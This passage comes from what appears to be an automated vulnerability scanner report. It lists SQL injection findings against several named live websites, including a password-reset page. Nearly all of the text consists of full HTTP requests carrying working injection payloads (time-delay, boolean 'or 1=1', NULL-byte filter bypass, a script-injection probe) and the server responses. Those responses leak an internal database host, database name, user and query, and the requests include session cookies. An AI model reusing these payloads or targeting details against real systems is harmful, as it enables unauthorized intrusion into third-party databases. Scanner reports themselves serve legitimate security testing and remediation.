<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.10. https://secure.trust-guard.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ,0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 25261 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /?1,0,0,0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.11. https://secure.trust-guard.com/ResetPassword.php [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header. The application took 51643 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=',0)waitfor%20delay'0%3a0%3a20'--
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:37:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.12. https://secure.trust-guard.com/ResetPassword.php [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header. The application took 52381 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24')waitfor%20delay'0%3a0%3a20'--
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:31:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.13. https://secure.trust-guard.com/ResetPassword.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 50215 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /ResetPassword.php?1',0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:11:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.14. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The txtEmail parameter appears to be vulnerable to SQL injection attacks. The payloads 19587081'%20or%201%3d1--%20 and 19587081'%20or%201%3d2--%20 were each submitted in the txtEmail parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=uh9nm4eto59nfd5fii6haostd4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 43

txtEmail=19587081'%20or%201%3d1--%20&btnSubmit=Submit&btnCancel=Cancel

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:59:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<title>Trust Guard Login</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form id="content:content" method="post" style="margin:0px" action="index.php">
<br /><br />
<script type="text/javascript">

function validateForm()
{
var message;
var nouser = (!validatePresent(document.getElementById('txtEmail'),'msg_user'));
var nopass = (!validatePresent(document.getElementById('txtPassword'),'msg_pass'));
if (nouser && nopass)
message = 'Please enter a username and a password.';
else if (nouser)
message = 'Please enter a username.';
else if (nopass)
message = 'Please enter a password.';

...[SNIP]...

Request 2

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=uh9nm4eto59nfd5fii6haostd4
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 43

txtEmail=19587081'%20or%201%3d2--%20&btnSubmit=Submit&btnCancel=Cancel

Response 2

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:59:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3795
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<title>Reset Password</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form method="post" style="margin:0px">

Enter you email address or site name below and click Submit and we will send you a new password<br />
<input id="txtEmail" name="txtEmail" type="text" value="19587081' or 1=2-- " style="width:300px" onblur="validatePresent(this,'msg_email');" /><br />
<div id="msg_email">&nbsp;</div>
<span style="color:Red">
<span id='lblResult' >Could not find an account will the site 19587081' or 1=2-- .</span> </span>
<br />
<input id='btnSubmit' name='btnSubmit' type="submit" value="Submit"
onclick="return validatePresent(document.getElementById('php:txtEm
...[SNIP]...

2.15. https://secure.trust-guard.com/index.php [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmb cookie. The application took 24998 milliseconds to respond to the request, compared with 6249 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384',0,0)waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:13:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5139
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.16. https://secure.trust-guard.com/index.php [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie. The application took 25028 milliseconds to respond to the request, compared with 6249 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)',0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:06:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.17. https://secure.trust-guard.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 50183 milliseconds to respond to the request, compared with 25087 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /index.php/1'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; PHPSESSID=j3kca4chjn64leo452bv3ml9a4

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:55:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

2.18. https://subscribe.haymarketmedia.com/scm/ [form parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Issue detail

The form parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the form parameter. The application took 20441 milliseconds to respond to the request, compared with 380 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /scm/?form='waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vdpcmz451e1pnq55altbbjzz; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:49 GMT
Content-Length: 5478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...

2.19. http://tours.sapha.com/ [scs_sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_sid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the scs_sid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+%00'&scs_tid=1488 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:14:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 412

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1)<br>
...[SNIP]...

2.20. http://tours.sapha.com/ [scs_sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_sid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the scs_sid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?scs_sid=2546'&scs_tid=-1+OR+17-7%3d10 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08; sapha_1_19=110363%7C2676569%7C2668748%7C2011-05-06+16%3A06%3A39

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:08:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 391

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '2546''<br>
<b>MySQL
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2546''' at line 1)<br>
...[SNIP]...

Request 2

GET /?scs_sid=2546''&scs_tid=-1+OR+17-7%3d10 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08; sapha_1_19=110363%7C2676569%7C2668748%7C2011-05-06+16%3A06%3A39

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:08:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102

<html><body><h1>An error has occurred.</h1><p>Please contact support for assistance.</p></body></html>

2.21. http://tours.sapha.com/ [scs_tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_tid parameter appears to be vulnerable to SQL injection attacks. The payloads 29377093'%20or%201%3d1--%20 and 29377093'%20or%201%3d2--%20 were each submitted in the scs_tid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?scs_sid=2546&scs_tid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000074)%3C/script%3E29377093'%20or%201%3d1--%20&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102

<html><body><h1>An error has occurred.</h1><p>Please contact support for assistance.</p></body></html>

Request 2

GET /?scs_sid=2546&scs_tid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000074)%3C/script%3E29377093'%20or%201%3d2--%20&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
